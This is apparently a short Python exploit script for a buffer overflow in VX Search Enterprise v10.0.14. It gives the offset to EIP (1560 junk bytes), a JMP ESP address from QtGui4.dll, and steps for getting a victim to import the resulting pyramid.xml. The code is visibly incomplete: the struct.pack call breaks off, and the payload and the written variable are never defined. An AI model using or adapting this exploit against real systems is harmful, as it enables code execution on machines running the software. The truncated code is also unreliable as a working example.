#!/usr/bin/python # Exploit Title : VX Search Enterprise v10.0.14 - Buffer Overflow # Discovery by : Anurag Srivastava # Email : anurag.srivastava@pyramidcyber.com # Website : www.pyramidcyber.com # Discovery Date : 25/08/2017 # Software Link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.0.14.exe # Tested Version : 10.0.14 # Tested on OS : Windows 7 Ultimate x64bit and Windows 10 Home Edition x64 # Steps to Reproduce: Run the python file to generate pyramid.xml and then open VX Search Enterprise software , right click and click on import command . Select pyramid.xml file . import os,struct #offset to eip junk = "A" * (1560) #JMP ESP (QtGui4.dll) jmp1 = struct.pack('' f = open('pyramid.xml', 'w') f.write(file) f.close()